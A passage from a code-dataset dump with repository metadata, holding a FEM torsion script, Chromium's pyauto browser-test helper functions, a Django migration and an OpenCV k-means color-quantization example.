for i, e in enumerate(O.elements):
_, _u = e.giveSolution(domain='gauss-points')
jac, dpz = e.J(e.Z.T)
detjac = np.linalg.det(jac)
integral += np.sum(_u*e.W*detjac)
print(integral*2/G)
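# Editorial sketch with made-up numbers, not part of the original example:
# each element contribution above is a Gauss-point sum,
# integral ~ sum_i u_i * w_i * det(J)_i, illustrated here in isolation.
_u_demo = np.array([1.0, 1.0, 1.0])    # hypothetical solution values at 3 Gauss points
_w_demo = np.array([1/3, 1/3, 1/3])    # hypothetical matching quadrature weights
_detjac_demo = 0.5                     # hypothetical constant Jacobian determinant
print(np.sum(_u_demo * _w_demo * _detjac_demo))  # approximates one element integral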
| 27.115385
| 80
| 0.574468
|
import numpy as np
import matplotlib.pyplot as plt
from FEM.Torsion2D import Torsion2D
from FEM.Mesh.Delaunay import Delaunay
a = 0.3
b = 0.3
tw = 0.05
tf = 0.05
E = 200000
v = 0.27
G = E / (2 * (1 + v))
phi = 1
vertices = [
[0, 0],
[a, 0],
[a, tf],
[a / 2 + tw / 2, tf],
[a / 2 + tw / 2, tf + b],
[a, tf + b],
[a, 2 * tf + b],
[0, 2 * tf + b],
[0, tf + b],
[a / 2 - tw / 2, tf + b],
[a / 2 - tw / 2, tf],
[0, tf],
]
fillet_radius = 0.0254
fillets = [{'start_segment': 2, 'end_segment': 3, 'r': fillet_radius, 'n': 10},
{'start_segment': 3, 'end_segment': 4, 'r': fillet_radius, 'n': 10},
{'start_segment': 8, 'end_segment': 9, 'r': fillet_radius, 'n': 10},
{'start_segment': 9, 'end_segment': 10, 'r': fillet_radius, 'n': 10}]
params = Delaunay._strdelaunay(constrained=True, delaunay=True,
a='0.00003', o=2)
geometria = Delaunay(vertices, params, fillets=fillets)
geometria.show()
plt.show()
print(len(geometria.elements))
O = Torsion2D(geometria, G, phi)
O.solve()
plt.show()
integral = 0
for i, e in enumerate(O.elements):
_, _u = e.giveSolution(domain='gauss-points')
jac, dpz = e.J(e.Z.T)
detjac = np.linalg.det(jac)
integral += np.sum(_u*e.W*detjac)
print(integral*2/G)
| true
| true
|
1c3e7aece6b9e5fafeb3f4141d5fc01faaf56eec
| 14,849
|
py
|
Python
|
chrome/test/functional/test_utils.py
|
gavinp/chromium
|
681563ea0f892a051f4ef3d5e53438e0bb7d2261
|
[
"BSD-3-Clause"
] | 1
|
2016-03-10T09:13:57.000Z
|
2016-03-10T09:13:57.000Z
|
chrome/test/functional/test_utils.py
|
gavinp/chromium
|
681563ea0f892a051f4ef3d5e53438e0bb7d2261
|
[
"BSD-3-Clause"
] | 1
|
2022-03-13T08:39:05.000Z
|
2022-03-13T08:39:05.000Z
|
chrome/test/functional/test_utils.py
|
gavinp/chromium
|
681563ea0f892a051f4ef3d5e53438e0bb7d2261
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import ctypes
import email
import logging
import os
import platform
import shutil
import smtplib
import subprocess
import sys
import types
import pyauto_functional
import pyauto
import pyauto_utils
"""Commonly used functions for PyAuto tests."""
def CopyFileFromDataDirToDownloadDir(test, file_path):
"""Copy a file from data directory to downloads directory.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
path: path of the file relative to the data directory
"""
data_file = os.path.join(test.DataDir(), file_path)
download_dir = test.GetDownloadDirectory().value()
shutil.copy(data_file, download_dir)
def DownloadFileFromDownloadsDataDir(test, file_name):
"""Download a file from downloads data directory, in first tab, first window.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
file_name: name of file to download.
"""
file_url = test.GetFileURLForDataPath(os.path.join('downloads', file_name))
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
# Check if file already exists. If so then delete it.
if os.path.exists(downloaded_pkg):
RemoveDownloadedTestFile(test, file_name)
pre_download_ids = [x['id'] for x in test.GetDownloadsInfo().Downloads()]
test.DownloadAndWaitForStart(file_url)
test.WaitForAllDownloadsToComplete(pre_download_ids)
def RemoveDownloadedTestFile(test, file_name):
"""Delete a file from the downloads directory.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
file_name: name of the file to remove.
"""
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
pyauto_utils.RemovePath(downloaded_pkg)
pyauto_utils.RemovePath(downloaded_pkg + '.crdownload')
def GoogleAccountsLogin(test, username, password, tab_index=0, windex=0):
"""Log into Google Accounts.
Attempts to log in to Google by entering the username/password into the
Google login page and clicking the submit button.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
username: user's login username.
password: user's login password.
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
test.NavigateToURL('https://www.google.com/accounts/', windex, tab_index)
email_id = 'document.getElementById("Email").value = "%s"; ' \
'window.domAutomationController.send("done")' % username
password = 'document.getElementById("Passwd").value = "%s"; ' \
'window.domAutomationController.send("done")' % password
test.ExecuteJavascript(email_id, tab_index, windex)
test.ExecuteJavascript(password, tab_index, windex)
test.assertTrue(test.SubmitForm('gaia_loginform', tab_index, windex))
def VerifyGoogleAccountCredsFilled(test, username, password, tab_index=0,
windex=0):
"""Verify stored/saved user and password values to the values in the field.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
username: user's login username.
password: user's login password.
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
email_value = test.GetDOMValue('document.getElementById("Email").value',
tab_index, windex)
passwd_value = test.GetDOMValue('document.getElementById("Passwd").value',
tab_index, windex)
test.assertEqual(email_value, username)
# Not using assertEqual because if it fails it would end up dumping the
# password (which is supposed to be private)
test.assertTrue(passwd_value == password)
def ClearPasswords(test):
"""Clear saved passwords."""
test.ClearBrowsingData(['PASSWORDS'], 'EVERYTHING')
def Shell2(cmd_string, bg=False):
"""Run a shell command.
Args:
cmd_string: command to run
bg: should the process be run in background? Default: False
Returns:
Output, return code
"""
if not cmd_string: return ('', 0)
if bg:
cmd_string += ' 1>/dev/null 2>&1 &'
proc = os.popen(cmd_string)
if bg: return ('Background process: %s' % cmd_string, 0)
out = proc.read()
retcode = proc.close()
if not retcode: # Success
retcode = 0
return (out, retcode)
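# Editorial usage sketch, not part of the original module:
#   out, retcode = Shell2('echo hello')   # -> ('hello\n', 0) on a POSIX shell
#   Shell2('sleep 60', bg=True)           # detaches and returns a status string with code 0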
def SendMail(send_from, send_to, subject, text, smtp, file_to_send=None):
"""Send mail to all the group to notify about the crash and uploaded data.
Args:
send_from: from mail id.
send_to: to mail id.
subject: mail subject.
text: mail body.
smtp: The smtp to use.
file_to_send: attachments for the mail.
"""
msg = email.MIMEMultipart.MIMEMultipart()
msg['From'] = send_from
msg['To'] = send_to
msg['Date'] = email.Utils.formatdate(localtime=True)
msg['Subject'] = subject
# To send multiple files in one message, introduce a for loop over the files here.
msg.attach(email.MIMEText.MIMEText(text))
part = email.MIMEBase.MIMEBase('application', 'octet-stream')
if file_to_send is not None:
part.set_payload(open(file_to_send,'rb').read())
email.Encoders.encode_base64(part)
part.add_header('Content-Disposition',
'attachment; filename="%s"'
% os.path.basename(file_to_send))
msg.attach(part)
smtp_obj = smtplib.SMTP(smtp)
smtp_obj.sendmail(send_from, send_to, msg.as_string())
smtp_obj.close()
def GetFreeSpace(path):
"""Returns the free space (in bytes) on the drive containing |path|."""
if sys.platform == 'win32':
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(
ctypes.c_wchar_p(os.path.dirname(path)), None, None,
ctypes.pointer(free_bytes))
return free_bytes.value
fs_stat = os.statvfs(path)
return fs_stat.f_bsize * fs_stat.f_bavail
def StripUnmatchedKeys(item_to_strip, reference_item):
"""Returns a copy of 'item_to_strip' where unmatched key-value pairs in
every dictionary are removed.
This will examine each dictionary in 'item_to_strip' recursively, and will
remove keys that are not found in the corresponding dictionary in
'reference_item'. This is useful for testing equality of a subset of data.
Items may contain dictionaries, lists, or primitives, but only corresponding
dictionaries will be stripped. A corresponding entry is one which is found
in the same index in the corresponding parent array or at the same key in the
corresponding parent dictionary.
Args:
item_to_strip: item to copy and remove all unmatched key-value pairs
reference_item: item that serves as a reference for which keys-value pairs
to strip from 'item_to_strip'
Returns:
a copy of 'item_to_strip' where all key-value pairs that do not have a
matching key in 'reference_item' are removed
Example:
item_to_strip = {'tabs': 3,
'time': 5908}
reference_item = {'tabs': 2}
StripUnmatchedKeys(item_to_strip, reference_item) will return {'tabs': 3}
"""
def StripList(list1, list2):
return_list = copy.deepcopy(list2)
for i in range(min(len(list1), len(list2))):
return_list[i] = StripUnmatchedKeys(list1[i], list2[i])
return return_list
def StripDict(dict1, dict2):
return_dict = {}
for key in dict1:
if key in dict2:
return_dict[key] = StripUnmatchedKeys(dict1[key], dict2[key])
return return_dict
item_to_strip_type = type(item_to_strip)
if item_to_strip_type is type(reference_item):
if item_to_strip_type is types.ListType:
return StripList(item_to_strip, reference_item)
elif item_to_strip_type is types.DictType:
return StripDict(item_to_strip, reference_item)
return copy.deepcopy(item_to_strip)
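# Editorial sketch, not part of the original module, showing the recursion:
#   StripUnmatchedKeys({'a': 1, 'b': {'c': 2, 'd': 3}}, {'a': 0, 'b': {'c': 9}})
#   returns {'a': 1, 'b': {'c': 2}} - values come from the first argument, and
#   keys are kept only if the second argument has them at the same position.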
def StringContentCheck(test, content_string, have_list, nothave_list):
"""Check for the presence or absence of strings within content.
Confirm all strings in |have_list| are found in |content_string|.
Confirm all strings in |nothave_list| are not found in |content_string|.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
content_string: string containing the content to check.
have_list: list of strings expected to be found within the content.
nothave_list: list of strings expected to not be found within the content.
"""
for s in have_list:
test.assertTrue(s in content_string,
msg='"%s" missing from content.' % s)
for s in nothave_list:
test.assertTrue(s not in content_string,
msg='"%s" unexpectedly contained in content.' % s)
def CallFunctionWithNewTimeout(self, new_timeout, function):
"""Sets the timeout to |new_timeout| and calls |function|.
This method resets the timeout before returning.
"""
timeout_changer = pyauto.PyUITest.ActionTimeoutChanger(
self, new_timeout)
logging.info('Automation execution timeout has been changed to %d. '
'If the timeout is large the test might appear to hang.'
% new_timeout)
function()
del timeout_changer
def GetOmniboxMatchesFor(self, text, windex=0, attr_dict=None):
"""Fetch omnibox matches with the given attributes for the given query.
Args:
text: the query text to use
windex: the window index to work on. Defaults to 0 (first window)
attr_dict: the dictionary of properties to be satisfied
Returns:
a list of match items
"""
self.SetOmniboxText(text, windex=windex)
self.WaitUntilOmniboxQueryDone(windex=windex)
if not attr_dict:
matches = self.GetOmniboxInfo(windex=windex).Matches()
else:
matches = self.GetOmniboxInfo(windex=windex).MatchesWithAttributes(
attr_dict=attr_dict)
return matches
def GetMemoryUsageOfProcess(pid):
"""Queries the system for the current memory usage of a specified process.
This function only works on Linux and ChromeOS.
Args:
pid: The integer process identifier for the process to use.
Returns:
The memory usage of the process in MB, given as a float. If the process
doesn't exist on the machine, then the value 0 is returned.
"""
assert pyauto.PyUITest.IsLinux() or pyauto.PyUITest.IsChromeOS()
process = subprocess.Popen('ps h -o rss -p %s' % pid, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = process.communicate()[0]
if stdout:
return float(stdout.strip()) / 1024
else:
return 0
def GetCredsKey():
"""Get the credential key associated with a bot on the waterfall.
The key maps to the proper credentials in the text data file stored in the
private directory and encodes the bot's OS and machine name. Each key is
associated with its own username/password pair, which allows sync
integration tests to run in parallel on all bots.
Returns:
A String of the credentials key for the specified bot. Otherwise None.
"""
if pyauto.PyUITest.IsWin():
system_name = 'win'
elif pyauto.PyUITest.IsLinux():
system_name = 'linux'
elif pyauto.PyUITest.IsMac():
system_name = 'mac'
else:
return None
node = platform.uname()[1].split('.')[0]
creds_key = 'test_google_acct_%s_%s' % (system_name, node)
return creds_key
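# Editorial example, not part of the original module: on a Linux bot whose
# hostname is build42.example.org (hostname is hypothetical), the key built
# above would be 'test_google_acct_linux_build42'.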
def SignInToSyncAndVerifyState(test, account_key):
"""Sign into sync and verify that it was successful.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
account_key: the credentials key in the private account dictionary file.
"""
creds = test.GetPrivateInfo()[account_key]
username = creds['username']
password = creds['password']
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Never')
test.assertTrue(test.SignInToSync(username, password))
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Just now')
def LoginToDevice(test, test_account='test_google_account'):
"""Login to the Chromeos device using the given test account.
If no test account is specified, we use test_google_account as the default.
You can choose test accounts from -
chrome/test/data/pyauto_private/private_tests_info.txt
Args:
test_account: The account used to login to the Chromeos device.
"""
if not test.GetLoginInfo()['is_logged_in']:
credentials = test.GetPrivateInfo()[test_account]
test.Login(credentials['username'], credentials['password'])
login_info = test.GetLoginInfo()
test.assertTrue(login_info['is_logged_in'], msg='Login failed.')
else:
test.fail(msg='Another user is already logged in. Please logout first.')
def GetInfobarIndexByType(test, infobar_type, windex=0, tab_index=0):
"""Returns the index of the infobar of the given type.
Args:
test: Derived from pyauto.PyUITest - base class for UI test cases.
infobar_type: The infobar type to look for.
windex: Window index.
tab_index: Tab index.
Returns:
Index of infobar for infobar type, or None if not found.
"""
infobar_list = (
test.GetBrowserInfo()['windows'][windex]['tabs'][tab_index] \
['infobars'])
for infobar in infobar_list:
if infobar_type == infobar['type']:
return infobar_list.index(infobar)
return None
def WaitForInfobarTypeAndGetIndex(test, infobar_type, windex=0, tab_index=0):
"""Wait for infobar type to appear and returns its index.
If the infobar never appears, an exception will be raised.
Args:
test: Derived from pyauto.PyUITest - base class for UI test cases.
infobar_type: The infobar type to look for.
windex: Window index. Defaults to 0 (first window).
tab_index: Tab index. Defaults to 0 (first tab).
Returns:
Index of infobar for infobar type.
"""
test.assertTrue(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None),
msg='Infobar type for %s did not appear.' % infobar_type)
# Return the infobar index.
return GetInfobarIndexByType(test, infobar_type, windex, tab_index)
def AssertInfobarTypeDoesNotAppear(test, infobar_type, windex=0, tab_index=0):
"""Check that the infobar type does not appear.
This function waits 20s to assert that the infobar does not appear.
Args:
test: Derived from pyauto.PyUITest - base class for UI test cases.
infobar_type: The infobar type to look for.
windex: Window index. Defaults to 0 (first window).
tab_index: Tab index. Defaults to 0 (first tab).
"""
test.assertFalse(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None, timeout=20),
msg=('Infobar type for %s appeared when it should be hidden.'
% infobar_type))
| 35.270784
| 80
| 0.709947
|
import copy
import ctypes
import email
import logging
import os
import platform
import shutil
import smtplib
import subprocess
import sys
import types
import pyauto_functional
import pyauto
import pyauto_utils
def CopyFileFromDataDirToDownloadDir(test, file_path):
data_file = os.path.join(test.DataDir(), file_path)
download_dir = test.GetDownloadDirectory().value()
shutil.copy(data_file, download_dir)
def DownloadFileFromDownloadsDataDir(test, file_name):
file_url = test.GetFileURLForDataPath(os.path.join('downloads', file_name))
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
if os.path.exists(downloaded_pkg):
RemoveDownloadedTestFile(test, file_name)
pre_download_ids = [x['id'] for x in test.GetDownloadsInfo().Downloads()]
test.DownloadAndWaitForStart(file_url)
test.WaitForAllDownloadsToComplete(pre_download_ids)
def RemoveDownloadedTestFile(test, file_name):
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
pyauto_utils.RemovePath(downloaded_pkg)
pyauto_utils.RemovePath(downloaded_pkg + '.crdownload')
def GoogleAccountsLogin(test, username, password, tab_index=0, windex=0):
test.NavigateToURL('https://www.google.com/accounts/', windex, tab_index)
email_id = 'document.getElementById("Email").value = "%s"; ' \
'window.domAutomationController.send("done")' % username
password = 'document.getElementById("Passwd").value = "%s"; ' \
'window.domAutomationController.send("done")' % password
test.ExecuteJavascript(email_id, tab_index, windex)
test.ExecuteJavascript(password, tab_index, windex)
test.assertTrue(test.SubmitForm('gaia_loginform', tab_index, windex))
def VerifyGoogleAccountCredsFilled(test, username, password, tab_index=0,
windex=0):
email_value = test.GetDOMValue('document.getElementById("Email").value',
tab_index, windex)
passwd_value = test.GetDOMValue('document.getElementById("Passwd").value',
tab_index, windex)
test.assertEqual(email_value, username)
test.assertTrue(passwd_value == password)
def ClearPasswords(test):
test.ClearBrowsingData(['PASSWORDS'], 'EVERYTHING')
def Shell2(cmd_string, bg=False):
if not cmd_string: return ('', 0)
if bg:
cmd_string += ' 1>/dev/null 2>&1 &'
proc = os.popen(cmd_string)
if bg: return ('Background process: %s' % cmd_string, 0)
out = proc.read()
retcode = proc.close()
if not retcode:
retcode = 0
return (out, retcode)
def SendMail(send_from, send_to, subject, text, smtp, file_to_send=None):
msg = email.MIMEMultipart.MIMEMultipart()
msg['From'] = send_from
msg['To'] = send_to
msg['Date'] = email.Utils.formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(email.MIMEText.MIMEText(text))
part = email.MIMEBase.MIMEBase('application', 'octet-stream')
if file_to_send is not None:
part.set_payload(open(file_to_send,'rb').read())
email.Encoders.encode_base64(part)
part.add_header('Content-Disposition',
'attachment; filename="%s"'
% os.path.basename(file_to_send))
msg.attach(part)
smtp_obj = smtplib.SMTP(smtp)
smtp_obj.sendmail(send_from, send_to, msg.as_string())
smtp_obj.close()
def GetFreeSpace(path):
if sys.platform == 'win32':
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(
ctypes.c_wchar_p(os.path.dirname(path)), None, None,
ctypes.pointer(free_bytes))
return free_bytes.value
fs_stat = os.statvfs(path)
return fs_stat.f_bsize * fs_stat.f_bavail
def StripUnmatchedKeys(item_to_strip, reference_item):
def StripList(list1, list2):
return_list = copy.deepcopy(list2)
for i in range(min(len(list1), len(list2))):
return_list[i] = StripUnmatchedKeys(list1[i], list2[i])
return return_list
def StripDict(dict1, dict2):
return_dict = {}
for key in dict1:
if key in dict2:
return_dict[key] = StripUnmatchedKeys(dict1[key], dict2[key])
return return_dict
item_to_strip_type = type(item_to_strip)
if item_to_strip_type is type(reference_item):
if item_to_strip_type is types.ListType:
return StripList(item_to_strip, reference_item)
elif item_to_strip_type is types.DictType:
return StripDict(item_to_strip, reference_item)
return copy.deepcopy(item_to_strip)
def StringContentCheck(test, content_string, have_list, nothave_list):
for s in have_list:
test.assertTrue(s in content_string,
msg='"%s" missing from content.' % s)
for s in nothave_list:
test.assertTrue(s not in content_string,
msg='"%s" unexpectedly contained in content.' % s)
def CallFunctionWithNewTimeout(self, new_timeout, function):
timeout_changer = pyauto.PyUITest.ActionTimeoutChanger(
self, new_timeout)
logging.info('Automation execution timeout has been changed to %d. '
'If the timeout is large the test might appear to hang.'
% new_timeout)
function()
del timeout_changer
def GetOmniboxMatchesFor(self, text, windex=0, attr_dict=None):
self.SetOmniboxText(text, windex=windex)
self.WaitUntilOmniboxQueryDone(windex=windex)
if not attr_dict:
matches = self.GetOmniboxInfo(windex=windex).Matches()
else:
matches = self.GetOmniboxInfo(windex=windex).MatchesWithAttributes(
attr_dict=attr_dict)
return matches
def GetMemoryUsageOfProcess(pid):
assert pyauto.PyUITest.IsLinux() or pyauto.PyUITest.IsChromeOS()
process = subprocess.Popen('ps h -o rss -p %s' % pid, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = process.communicate()[0]
if stdout:
return float(stdout.strip()) / 1024
else:
return 0
def GetCredsKey():
if pyauto.PyUITest.IsWin():
system_name = 'win'
elif pyauto.PyUITest.IsLinux():
system_name = 'linux'
elif pyauto.PyUITest.IsMac():
system_name = 'mac'
else:
return None
node = platform.uname()[1].split('.')[0]
creds_key = 'test_google_acct_%s_%s' % (system_name, node)
return creds_key
def SignInToSyncAndVerifyState(test, account_key):
creds = test.GetPrivateInfo()[account_key]
username = creds['username']
password = creds['password']
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Never')
test.assertTrue(test.SignInToSync(username, password))
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Just now')
def LoginToDevice(test, test_account='test_google_account'):
if not test.GetLoginInfo()['is_logged_in']:
credentials = test.GetPrivateInfo()[test_account]
test.Login(credentials['username'], credentials['password'])
login_info = test.GetLoginInfo()
test.assertTrue(login_info['is_logged_in'], msg='Login failed.')
else:
test.fail(msg='Another user is already logged in. Please logout first.')
def GetInfobarIndexByType(test, infobar_type, windex=0, tab_index=0):
infobar_list = (
test.GetBrowserInfo()['windows'][windex]['tabs'][tab_index] \
['infobars'])
for infobar in infobar_list:
if infobar_type == infobar['type']:
return infobar_list.index(infobar)
return None
def WaitForInfobarTypeAndGetIndex(test, infobar_type, windex=0, tab_index=0):
test.assertTrue(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None),
msg='Infobar type for %s did not appear.' % infobar_type)
return GetInfobarIndexByType(test, infobar_type, windex, tab_index)
def AssertInfobarTypeDoesNotAppear(test, infobar_type, windex=0, tab_index=0):
test.assertFalse(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None, timeout=20),
msg=('Infobar type for %s appeared when it should be hidden.'
% infobar_type))
| true
| true
|
1c3e7b52832204ee95f8948fbb41dd0bd1476aab
| 222
|
py
|
Python
|
importError.py
|
mkseth4774/ine-guide-to-network-programmability-python-course-files
|
35c49dfcf8e8f1b69435987a00fb9a236b803d9f
|
[
"MIT"
] | null | null | null |
importError.py
|
mkseth4774/ine-guide-to-network-programmability-python-course-files
|
35c49dfcf8e8f1b69435987a00fb9a236b803d9f
|
[
"MIT"
] | null | null | null |
importError.py
|
mkseth4774/ine-guide-to-network-programmability-python-course-files
|
35c49dfcf8e8f1b69435987a00fb9a236b803d9f
|
[
"MIT"
] | null | null | null |
##
##
try:
import sys
import os
import time
import somethingthatdoesnotexist
except ImportError:
print('Houston, we have an import problem!')
print('We are going to run anyway!')
##
## End of file...
| 14.8
| 48
| 0.657658
|
try:
import sys
import os
import time
import somethingthatdoesnotexist
except ImportError:
print('Houston, we have an import problem!')
print('We are going to run anyway!')
| true
| true
|
1c3e7e00dd940ceea153638844fe30bac5ad49cd
| 1,687
|
py
|
Python
|
UMSLHackRestAPI/api/migrations/0002_auto_20200222_1833.py
|
trujivan/climate-impact-changes
|
609b8197b0ede1c1fdac3aa82b34e73e6f4526e3
|
[
"MIT"
] | 1
|
2020-03-29T17:52:26.000Z
|
2020-03-29T17:52:26.000Z
|
UMSLHackRestAPI/api/migrations/0002_auto_20200222_1833.py
|
trujivan/climate-impact-changes
|
609b8197b0ede1c1fdac3aa82b34e73e6f4526e3
|
[
"MIT"
] | 6
|
2021-03-19T00:01:21.000Z
|
2021-09-22T18:37:17.000Z
|
UMSLHackRestAPI/api/migrations/0002_auto_20200222_1833.py
|
trujivan/climate-impact-changes
|
609b8197b0ede1c1fdac3aa82b34e73e6f4526e3
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.3 on 2020-02-23 00:33
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='MLRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_year', models.IntegerField(default=2017)),
('end_year', models.IntegerField(default=2020)),
('state', models.CharField(max_length=100)),
('factor', models.CharField(max_length=50)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.AlterField(
model_name='yearmodel',
name='year',
field=models.IntegerField(choices=[(2017, 2017), (2018, 2018), (2019, 2019), (2020, 2020), (2021, 2021), (2022, 2022), (2023, 2023), (2024, 2024), (2025, 2025), (2026, 2026), (2027, 2027), (2028, 2028), (2029, 2029)], default=api.models.current_year),
),
migrations.CreateModel(
name='Prediction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('year', models.IntegerField()),
('pollution', models.DecimalField(decimal_places=2, max_digits=32)),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='predictions', to='api.MLRequest')),
],
),
]
| 41.146341
| 263
| 0.583284
|
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='MLRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_year', models.IntegerField(default=2017)),
('end_year', models.IntegerField(default=2020)),
('state', models.CharField(max_length=100)),
('factor', models.CharField(max_length=50)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.AlterField(
model_name='yearmodel',
name='year',
field=models.IntegerField(choices=[(2017, 2017), (2018, 2018), (2019, 2019), (2020, 2020), (2021, 2021), (2022, 2022), (2023, 2023), (2024, 2024), (2025, 2025), (2026, 2026), (2027, 2027), (2028, 2028), (2029, 2029)], default=api.models.current_year),
),
migrations.CreateModel(
name='Prediction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('year', models.IntegerField()),
('pollution', models.DecimalField(decimal_places=2, max_digits=32)),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='predictions', to='api.MLRequest')),
],
),
]
| true
| true
|
1c3e7e4ce8433895dd5660f5df52b956b3fc31ee
| 2,269
|
py
|
Python
|
Chapter10/01-chapter-content/k_means_color_quantization.py
|
yaojh01/Mastering-OpenCV-4-with-Python
|
e8f83e314b8ed638edb6515967cfb24361b787af
|
[
"MIT"
] | 2
|
2021-06-29T22:00:47.000Z
|
2021-06-30T02:46:19.000Z
|
Chapter10/01-chapter-content/k_means_color_quantization.py
|
yaojh01/Mastering-OpenCV-4-with-Python
|
e8f83e314b8ed638edb6515967cfb24361b787af
|
[
"MIT"
] | null | null | null |
Chapter10/01-chapter-content/k_means_color_quantization.py
|
yaojh01/Mastering-OpenCV-4-with-Python
|
e8f83e314b8ed638edb6515967cfb24361b787af
|
[
"MIT"
] | 1
|
2019-10-03T20:34:43.000Z
|
2019-10-03T20:34:43.000Z
|
"""
K-means clustering algorithm applied to color quantization
"""
# Import required packages:
import numpy as np
import cv2
from matplotlib import pyplot as plt
def show_img_with_matplotlib(color_img, title, pos):
"""Shows an image using matplotlib capabilities"""
# Convert BGR image to RGB
img_RGB = color_img[:, :, ::-1]
ax = plt.subplot(2, 3, pos)
plt.imshow(img_RGB)
plt.title(title)
plt.axis('off')
def color_quantization(image, k):
"""Performs color quantization using K-means clustering algorithm"""
# Transform image into 'data':
data = np.float32(image).reshape((-1, 3))
# print(data.shape)
# Define the algorithm termination criteria (the maximum number of iterations and/or the desired accuracy):
# In this case the maximum number of iterations is set to 20 and epsilon = 1.0
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 20, 1.0)
# Apply K-means clustering algorithm:
ret, label, center = cv2.kmeans(data, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# At this point we can make the image with k colors
# Convert center to uint8:
center = np.uint8(center)
# Replace pixel values with their center value:
result = center[label.flatten()]
result = result.reshape(img.shape)
return result
# Create the dimensions of the figure and set title:
fig = plt.figure(figsize=(16, 8))
plt.suptitle("Color quantization using K-means clustering algorithm", fontsize=14, fontweight='bold')
fig.patch.set_facecolor('silver')
# Load BGR image:
img = cv2.imread('landscape_1.jpg')
# Apply color quantization:
color_3 = color_quantization(img, 3)
color_5 = color_quantization(img, 5)
color_10 = color_quantization(img, 10)
color_20 = color_quantization(img, 20)
color_40 = color_quantization(img, 40)
# Plot the images:
show_img_with_matplotlib(img, "original image", 1)
show_img_with_matplotlib(color_3, "color quantization (k = 3)", 2)
show_img_with_matplotlib(color_5, "color quantization (k = 5)", 3)
show_img_with_matplotlib(color_10, "color quantization (k = 10)", 4)
show_img_with_matplotlib(color_20, "color quantization (k = 20)", 5)
show_img_with_matplotlib(color_40, "color quantization (k = 40)", 6)
# Show the Figure:
plt.show()
| 31.957746
| 111
| 0.72543
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
def show_img_with_matplotlib(color_img, title, pos):
img_RGB = color_img[:, :, ::-1]
ax = plt.subplot(2, 3, pos)
plt.imshow(img_RGB)
plt.title(title)
plt.axis('off')
def color_quantization(image, k):
data = np.float32(image).reshape((-1, 3))
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 20, 1.0)
ret, label, center = cv2.kmeans(data, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
center = np.uint8(center)
result = center[label.flatten()]
result = result.reshape(img.shape)
return result
fig = plt.figure(figsize=(16, 8))
plt.suptitle("Color quantization using K-means clustering algorithm", fontsize=14, fontweight='bold')
fig.patch.set_facecolor('silver')
img = cv2.imread('landscape_1.jpg')
color_3 = color_quantization(img, 3)
color_5 = color_quantization(img, 5)
color_10 = color_quantization(img, 10)
color_20 = color_quantization(img, 20)
color_40 = color_quantization(img, 40)
show_img_with_matplotlib(img, "original image", 1)
show_img_with_matplotlib(color_3, "color quantization (k = 3)", 2)
show_img_with_matplotlib(color_5, "color quantization (k = 5)", 3)
show_img_with_matplotlib(color_10, "color quantization (k = 10)", 4)
show_img_with_matplotlib(color_20, "color quantization (k = 20)", 5)
show_img_with_matplotlib(color_40, "color quantization (k = 40)", 6)
plt.show()
| true
| true
|
1c3e7f168ba1b2c202fb5b181c9780fee159aa25
| 22,828
|
py
|
Python
|
test/test_md030_ordered.py
|
jackdewinter/pymarkdown
|
7ae408ba0b24506fa07552ffe520750bbff38c53
|
[
"MIT"
] | 20
|
2021-01-14T17:39:09.000Z
|
2022-03-14T08:35:22.000Z
|
test/test_md030_ordered.py
|
jackdewinter/pymarkdown
|
